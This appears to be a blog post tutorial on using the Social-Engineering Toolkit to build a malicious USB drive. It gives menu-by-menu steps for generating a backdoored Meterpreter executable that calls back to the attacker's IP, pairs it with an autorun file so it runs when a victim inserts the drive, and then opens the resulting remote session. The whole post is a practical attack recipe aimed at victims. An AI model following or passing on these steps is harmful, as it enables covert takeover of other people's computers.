Infectious Media Generator is a relatively simple attack vector. SET will create a Metasploit-based payload, setup a listener for you and generate a folder that needs to be burned or written to a DVD/USB drive. Once inserted, if AutoRun is enabled, the code will automatically execute and take control of the machine.
Open your backtrack terminal & Type cd /pentest/exploits/set
Now Open Social Engineering Toolkit (SET). /set
Now we will choose option 1, “Social-Engineering Attacks”
Choose option 2, “Standard Metaspolit Executable”
Enter IP Address for Reverse Connection type your IP Address (IP Address of Attacker PC)
Now choose 2 “Windows reverse_tcp Meterpreter”, but you have several to choose from including your own program.
Choose option 16, “Backdoored Executable (BEST)”
Port of the attacker computer. In this example I use port 4444, but you can change to 443
There’s two file autorun.inf and program.exe inside /pentest/exploits/set/autorun folder
Now copy both file in USB Drive When the victim plug our malicious USB and the autorun working
You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
0 commentaires:
Enregistrer un commentaire